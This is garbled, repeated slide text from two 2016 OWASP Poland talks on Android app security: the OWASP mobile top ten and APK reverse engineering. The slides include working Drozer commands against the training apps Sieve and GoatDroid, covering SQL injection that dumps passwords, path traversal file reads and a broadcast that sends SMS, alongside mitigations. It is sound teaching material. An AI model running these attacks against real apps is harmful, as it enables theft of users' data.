bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Drozer
Open source tool to interact with other applications through IPC - leading security assessment framework for Android
Manual on installation and usage
Drozer
The best thing about Drozer you donrsquot need to write your apps to interact with other apps )
dzgt run appactivitystart --action androidintentactionVIEW --data-uri httpwwwgooglecom --component comandroidbrowser comandroidbrowserBrowserActivity
DrozerIs installed in a default package of AppUse with adb so enough just bdquoclick-and-playrdquo
Activity components
An Activity provides a screen with which users can interact in order to do something Users can perform operations such as making a call sending an SMS etc
Example login screen of your Facebook app
Activities
Activity components attacks
bull If an activity can be triggered by other apps (by an attacker) it can be abused
bull Launching by intents itrsquos possible to achieve the followingndash Modify data in backgroundndash Tricking the userndash Leaking sensitive information
Activities
Activity components attacksbull General hijacking scheme
bull Results of an attackndash Malicious Activity could read the data in the Intent and then
immediately relay it to a legitimate onendash Spoofing the expected Activityrsquos user interface to steal user-supplied
data (phishing)
A B
E
Activities
Activity components attacks Activities
bull List and launch exported activities
dzgt run appactivityinfo -a commwrexamplesieve Package commwrexamplesieve commwrexamplesieveFileSelectActivity commwrexamplesieveMainLoginActivity commwrexamplesievePWList
dzgt run appactivitystart --component commwrexamplesieve commwrexamplesievePWList
Activity components demo Activities
Services
A Service can perform long-running operations in the background and does not provide a user interface Other components can bind to a Service which lets the binder invoke methods that are declared in the target Servicersquos interface Intents are used to start and bind to Services
Example playing music or downloading a file
Services
Services attacks
Although generally donrsquot seem dangerous they could potentially perform sensitive operations
To attack a service one need interaction (it must be exported or respondaccept input from message formats like intents files or the network stack)
Services
Services attacks
Typical attacks Denial of Service and Information Leakage
bull Find exported servicesbull Launch them one-by-one with logcat to check
for sensitive infobull Fire off intents and wait for it
Services
Content providers
A content provider presents data to external applications as one or more tables In other words content providers can be treated as interfaces that connect data in one process with code running in another process
Example using content providers any app can read SMS from inbuilt SMS apprsquos repository in our device
Content providers
Content providers
bull What info can they holdndash Userrsquos phone numbersndash Passwordsndash SMS
bull And one of the main problems are again permissions
run appproviderinfo --permission null
Content providers
Content providers attacks
bull Unrestricted access to app databasendash Just query it ndash run appproviderquery contentsettingssecure
bull SQL injectionbull Path traversal
Other attack vectors on auth might include altering data eg by using appproviderinsert command
Content providers
dzgt run scannerproviderinjection -a commwrexamplesieve
Content providers attacks
bull Unrestricted access to app database
Content providers
dzgt run scannerproviderfinduris -a commwrexamplesieve Accessible content URIs contentcommwrexamplesieveDBContentProviderKeys contentcommwrexamplesieveDBContentProviderPasswordscontentcommwrexamplesieveDBContentProviderPasswords
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --vertical
Content providers attacks
bull SQL injection
Content providers
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --selection unrecognized token ) (code 1) while compiling SELECT FROM Passwords WHERE ()
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --projection FROM Key--| Password | pin || thisismypassword | 9876 |
Content providers attacks
bull Path traversal
Content providers
One interesting real-life example httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-application
dzgt run appproviderread contentcommwrexamplesieveFileBackupProvideretchosts127001 localhost
dzgt run appproviderdownload contentcommwrexamplesieveFileBackupProviderdatadatacommwrexamplesie vedatabasesdatabasedb homeuserdatabasedbWritten 24576 bytes
Content providers demo Content providers
Broadcast receivers
A broadcast receiver is a component that responds to system-wide broadcast announcements such as Battery Low boot completed headset plug etc Though most of the broadcast receivers are originated by the system applications can also announce broadcasts
Broadcast receivers
Broadcast receivers
bull If receiver accepts broadcasts from untrusted sources app is at risk
Broadcast receivers
Broadcast receivers attacks
Typical fail authorization
bull Enumerate receiversbull Determine how the receiver handles the
actionbull Send intent and enjoy
Broadcast receivers
Broadcast receivers attacks
ltreceiver androidname=broadcastreceiversSendSMSNowReceiverrdquoandroidlabel=Send SMS gt ltintent-filtergt
ltaction androidname=orgowaspgoatdroidfourgoatsSOCIAL_SMS gt ltintent-filtergtltreceivergthellipltuses-permission androidname=androidpermissionSEND_SMS gt
Sample manifest from GoatDroid
Broadcast receivers
Broadcast receivers attacks
public void onReceive(Context arg0 Intent arg1) context = arg0 SmsManager sms = SmsManagergetDefault() Bundle bundle = arg1getExtras() smssendTextMessage(bundlegetString(phoneNumber) null bundlegetString(message) null null) UtilsmakeToast(context ConstantsTEXT_MESSAGE_SENT ToastLENGTH_LONG)
The following is the code that determines how the receiver handles the orgowaspgoatdroidfourgoatsSOCIAL_SMS actions
Broadcast receivers
Broadcast receivers attacks
run appbroadcastsend --action orgowaspgoatdroidfourgoatsSOCIAL_SMS --component orgowaspgoatdroidfourgoats orgowaspgoatdroidfourgoatsbroadcastreceiversSendSMSNowReceiver --extra string phoneNumber 1234567890 --extra string message PWNED
Broadcast receivers
General defenses for App Components
Applies for all abovementioned itemsbull Setting androidexported attribute to false
(only this user ID as the current app will be able to access the activity)
bull Limiting access with custom permissions for an activity (RECEIVE_SMS and others)
Referencesbull httpdeveloperandroidcomguidecomponentsindexhtmlbull httpdeveloperandroidcomguidetopicsmanifestmanifest-introhtmlbull http
resourcesinfosecinstitutecomandroid-hacking-security-part-1-exploiting-securing-application-components
bull httpresourcesinfosecinstitutecomandroid-hacking-security-part-2-content-provider-leakagebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-3-exploiting-broadcast-receiversbull httpyinzhicaoorgcoursesf15cse343443slidesmobilesecuritypdfbull httpswwwsafaribooksonlinecomlibraryviewandroid-security-cookbookbull httpswwwmwrinfosecuritycomsystemassets937originalmwri_drozer-user-guide_2015-03-23pdfbull httpsmanifestsecuritycomandroid-application-security-part-5bull httpsmanifestsecuritycomandroid-application-security-part-8bull httpswwweecsberkeleyedu~dawpapersintents-mobisys11pdfbull httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-applicationbull httpsgithubcomtanprathanMobileApp-Pentest-Cheatsheetandroid-application-penetration-testing
Thank you
bull For additional questions or just to stay in touch c0rdis
OWASP top 10 mobile risks
Pawel RzepaOWASP Poland24022016
Important notes
bull The goal of this presentation is to provide you a basic knowledge about mobile risks and easy methodology to find those risks in your applications
bull If you want to add anything importantinteresting and related to the topic ndash feel free to interrupt me )
What are we going to talk abouthellip
Before we starthellip the threat model
M2 - Insecure data storage
Insecure data storage ndash what it is
bull Simple words definition valuable pieces of data (eg passwords cookies personal information) are stored in the data-stores on the device in insecure (plain text or reversable encoding) format
Insecure data storage ndash what to look for
bull Look for any sensitive information inndash SQLite databases (local)ndash XML Data Storesndash Plain text configuration filesndash Cookie storesndash SD Card
Insecure data storage ndash how to find
bull Install and run application for some timebull Monitor changes in sdcard before and after
installing an applicationbull Analyze package files on different stages
adb pull datadataltapk_package_namegt
Insecure data storage - demo
Insecure data storage ndash real example
bull Outlook stored all attachements as unencrypted and world readable files on external storage
Insecure data storage - mitigations
bull Donrsquot store data unless itrsquos absolutely necessarry
bull Use encryption for local storage (use method setStorageEncryption)
bull For databases consider using SQLcipher for Sqlite data encryption
bull Ensure any shared preferences properties are NOT MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection ndash what it is
bull Simple words definition application does NOT implement TLS or it does incorrectly
What do you mean bdquoincorrectlyrdquo
bull Insecure implementations arendash Using known weak ciphers version (eg
SSLv2SSLv3 RC4)ndash Securing only part of the communication (eg only
authentication)ndash Lack of certificate inspection
Certificate inspection in web applications ndash chain of trustbull In web applications the validation of certificate is on the
side of a browserbull It is done by a bdquochain of trustrdquo
bull But how a mobile app can know if it is communicating with a proper server
Cert Pinning - theory
bull Embedded in source code expected X509 certificate or public key
if (presented_cert == pinned_cert)Start_connection()elseDrop_connection()
Cert Pinning - reality
bull Guys from Leibniz Universitaumlt Hannover tested 100 apps andhellip
bull 21 apps trust all certificatesbull 20 apps accept all hostnamesbull And in the end they asked developers why it
happenedhellip
More httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdf
Insufficient transport layer protection- how to find
bull Passive analysis with WiresharkBurp (to check if all traffic is encrypted)
bull Use Mallodroidmallodroidpy ndashf AppToCheckapk ndashd javaout
bull Look for end point implementation flaws using SSLyze (or httpswwwssllabscomssltest for public domain)
sslyze --regular wwwexamplecom443
Insufficient transport layer protection- example
Insufficient transport layer protection-few facts from reality
bull According to the FireEye research from July 17 2014 among 1000 most-downloaded free applications in the Google Play store
Source httpswwwfireeyecomblogthreat-research201408ssl-vulnerabilities-who-listens-when-android-applications-talkhtml
Insufficient transport layer protection- mitigationsbull Any sensitive data MUST be transfered over TLSbull How to do it properly Follow the rules https
wwwowasporgindexphpTransport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage ndash what it is
bull Simple word definition OSframeworks puts sensitive information in an insecure location in the device
bull Important note insecure data storage talks about developer conscious efforts to store data in insecure manner while unintended data leakage refers to OSframework specific quirks which can cause data leakages
Unintended data leakage ndash common leakage points
bull URL Caching bull CopyPaste buffer Cachingbull Loggingbull Analytics data sent to 3rd parties (eg ads
sending GPS location)
Unintended data leakage ndash how to find
bull Extract data from leaking content providers using Drozer
dzgt run appproviderfinduri ltpackage_namegt
bull Use logcat to verify what is being logged using ADBadb logcat [output filter]
bull Use listener (BurpWireshark) to monitor what is being sent to 3rd parties
bull Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
bull NEVER log any sensitive information (observe what yoursquore storing in crashlogs)
bull Disable copypaste function for sensitive part of the application
bull Disable debugging (androiddebuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication ndash what is it
bull Simple words definition if yoursquore able to bypass authentication andor laverage your privileges thenhellip your app has poor authorization andor authentication
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Drozer
The best thing about Drozer you donrsquot need to write your apps to interact with other apps )
dzgt run appactivitystart --action androidintentactionVIEW --data-uri httpwwwgooglecom --component comandroidbrowser comandroidbrowserBrowserActivity
DrozerIs installed in a default package of AppUse with adb so enough just bdquoclick-and-playrdquo
Activity components
An Activity provides a screen with which users can interact in order to do something Users can perform operations such as making a call sending an SMS etc
Example login screen of your Facebook app
Activities
Activity components attacks
bull If an activity can be triggered by other apps (by an attacker) it can be abused
bull Launching by intents itrsquos possible to achieve the followingndash Modify data in backgroundndash Tricking the userndash Leaking sensitive information
Activities
Activity components attacksbull General hijacking scheme
bull Results of an attackndash Malicious Activity could read the data in the Intent and then
immediately relay it to a legitimate onendash Spoofing the expected Activityrsquos user interface to steal user-supplied
data (phishing)
A B
E
Activities
Activity components attacks Activities
bull List and launch exported activities
dzgt run appactivityinfo -a commwrexamplesieve Package commwrexamplesieve commwrexamplesieveFileSelectActivity commwrexamplesieveMainLoginActivity commwrexamplesievePWList
dzgt run appactivitystart --component commwrexamplesieve commwrexamplesievePWList
Activity components demo Activities
Services
A Service can perform long-running operations in the background and does not provide a user interface Other components can bind to a Service which lets the binder invoke methods that are declared in the target Servicersquos interface Intents are used to start and bind to Services
Example playing music or downloading a file
Services
Services attacks
Although generally donrsquot seem dangerous they could potentially perform sensitive operations
To attack a service one need interaction (it must be exported or respondaccept input from message formats like intents files or the network stack)
Services
Services attacks
Typical attacks Denial of Service and Information Leakage
bull Find exported servicesbull Launch them one-by-one with logcat to check
for sensitive infobull Fire off intents and wait for it
Services
Content providers
A content provider presents data to external applications as one or more tables In other words content providers can be treated as interfaces that connect data in one process with code running in another process
Example using content providers any app can read SMS from inbuilt SMS apprsquos repository in our device
Content providers
Content providers
bull What info can they holdndash Userrsquos phone numbersndash Passwordsndash SMS
bull And one of the main problems are again permissions
run appproviderinfo --permission null
Content providers
Content providers attacks
bull Unrestricted access to app databasendash Just query it ndash run appproviderquery contentsettingssecure
bull SQL injectionbull Path traversal
Other attack vectors on auth might include altering data eg by using appproviderinsert command
Content providers
dzgt run scannerproviderinjection -a commwrexamplesieve
Content providers attacks
bull Unrestricted access to app database
Content providers
dzgt run scannerproviderfinduris -a commwrexamplesieve Accessible content URIs contentcommwrexamplesieveDBContentProviderKeys contentcommwrexamplesieveDBContentProviderPasswordscontentcommwrexamplesieveDBContentProviderPasswords
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --vertical
Content providers attacks
bull SQL injection
Content providers
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --selection unrecognized token ) (code 1) while compiling SELECT FROM Passwords WHERE ()
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --projection FROM Key--| Password | pin || thisismypassword | 9876 |
Content providers attacks
bull Path traversal
Content providers
One interesting real-life example httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-application
dzgt run appproviderread contentcommwrexamplesieveFileBackupProvideretchosts127001 localhost
dzgt run appproviderdownload contentcommwrexamplesieveFileBackupProviderdatadatacommwrexamplesie vedatabasesdatabasedb homeuserdatabasedbWritten 24576 bytes
Content providers demo Content providers
Broadcast receivers
A broadcast receiver is a component that responds to system-wide broadcast announcements such as Battery Low boot completed headset plug etc Though most of the broadcast receivers are originated by the system applications can also announce broadcasts
Broadcast receivers
Broadcast receivers
bull If receiver accepts broadcasts from untrusted sources app is at risk
Broadcast receivers
Broadcast receivers attacks
Typical fail authorization
bull Enumerate receiversbull Determine how the receiver handles the
actionbull Send intent and enjoy
Broadcast receivers
Broadcast receivers attacks
ltreceiver androidname=broadcastreceiversSendSMSNowReceiverrdquoandroidlabel=Send SMS gt ltintent-filtergt
ltaction androidname=orgowaspgoatdroidfourgoatsSOCIAL_SMS gt ltintent-filtergtltreceivergthellipltuses-permission androidname=androidpermissionSEND_SMS gt
Sample manifest from GoatDroid
Broadcast receivers
Broadcast receivers attacks
public void onReceive(Context arg0 Intent arg1) context = arg0 SmsManager sms = SmsManagergetDefault() Bundle bundle = arg1getExtras() smssendTextMessage(bundlegetString(phoneNumber) null bundlegetString(message) null null) UtilsmakeToast(context ConstantsTEXT_MESSAGE_SENT ToastLENGTH_LONG)
The following is the code that determines how the receiver handles the orgowaspgoatdroidfourgoatsSOCIAL_SMS actions
Broadcast receivers
Broadcast receivers attacks
run appbroadcastsend --action orgowaspgoatdroidfourgoatsSOCIAL_SMS --component orgowaspgoatdroidfourgoats orgowaspgoatdroidfourgoatsbroadcastreceiversSendSMSNowReceiver --extra string phoneNumber 1234567890 --extra string message PWNED
Broadcast receivers
General defenses for App Components
Applies for all abovementioned itemsbull Setting androidexported attribute to false
(only this user ID as the current app will be able to access the activity)
bull Limiting access with custom permissions for an activity (RECEIVE_SMS and others)
Referencesbull httpdeveloperandroidcomguidecomponentsindexhtmlbull httpdeveloperandroidcomguidetopicsmanifestmanifest-introhtmlbull http
resourcesinfosecinstitutecomandroid-hacking-security-part-1-exploiting-securing-application-components
bull httpresourcesinfosecinstitutecomandroid-hacking-security-part-2-content-provider-leakagebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-3-exploiting-broadcast-receiversbull httpyinzhicaoorgcoursesf15cse343443slidesmobilesecuritypdfbull httpswwwsafaribooksonlinecomlibraryviewandroid-security-cookbookbull httpswwwmwrinfosecuritycomsystemassets937originalmwri_drozer-user-guide_2015-03-23pdfbull httpsmanifestsecuritycomandroid-application-security-part-5bull httpsmanifestsecuritycomandroid-application-security-part-8bull httpswwweecsberkeleyedu~dawpapersintents-mobisys11pdfbull httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-applicationbull httpsgithubcomtanprathanMobileApp-Pentest-Cheatsheetandroid-application-penetration-testing
Thank you
bull For additional questions or just to stay in touch c0rdis
OWASP top 10 mobile risks
Pawel RzepaOWASP Poland24022016
Important notes
bull The goal of this presentation is to provide you a basic knowledge about mobile risks and easy methodology to find those risks in your applications
bull If you want to add anything importantinteresting and related to the topic ndash feel free to interrupt me )
What are we going to talk abouthellip
Before we starthellip the threat model
M2 - Insecure data storage
Insecure data storage ndash what it is
bull Simple words definition valuable pieces of data (eg passwords cookies personal information) are stored in the data-stores on the device in insecure (plain text or reversable encoding) format
Insecure data storage ndash what to look for
bull Look for any sensitive information inndash SQLite databases (local)ndash XML Data Storesndash Plain text configuration filesndash Cookie storesndash SD Card
Insecure data storage ndash how to find
bull Install and run application for some timebull Monitor changes in sdcard before and after
installing an applicationbull Analyze package files on different stages
adb pull datadataltapk_package_namegt
Insecure data storage - demo
Insecure data storage ndash real example
bull Outlook stored all attachements as unencrypted and world readable files on external storage
Insecure data storage - mitigations
bull Donrsquot store data unless itrsquos absolutely necessarry
bull Use encryption for local storage (use method setStorageEncryption)
bull For databases consider using SQLcipher for Sqlite data encryption
bull Ensure any shared preferences properties are NOT MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection ndash what it is
bull Simple words definition application does NOT implement TLS or it does incorrectly
What do you mean bdquoincorrectlyrdquo
bull Insecure implementations arendash Using known weak ciphers version (eg
SSLv2SSLv3 RC4)ndash Securing only part of the communication (eg only
authentication)ndash Lack of certificate inspection
Certificate inspection in web applications ndash chain of trustbull In web applications the validation of certificate is on the
side of a browserbull It is done by a bdquochain of trustrdquo
bull But how a mobile app can know if it is communicating with a proper server
Cert Pinning - theory
bull Embedded in source code expected X509 certificate or public key
if (presented_cert == pinned_cert)Start_connection()elseDrop_connection()
Cert Pinning - reality
bull Guys from Leibniz Universitaumlt Hannover tested 100 apps andhellip
bull 21 apps trust all certificatesbull 20 apps accept all hostnamesbull And in the end they asked developers why it
happenedhellip
More httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdf
Insufficient transport layer protection- how to find
bull Passive analysis with WiresharkBurp (to check if all traffic is encrypted)
bull Use Mallodroidmallodroidpy ndashf AppToCheckapk ndashd javaout
bull Look for end point implementation flaws using SSLyze (or httpswwwssllabscomssltest for public domain)
sslyze --regular wwwexamplecom443
Insufficient transport layer protection- example
Insufficient transport layer protection-few facts from reality
bull According to the FireEye research from July 17 2014 among 1000 most-downloaded free applications in the Google Play store
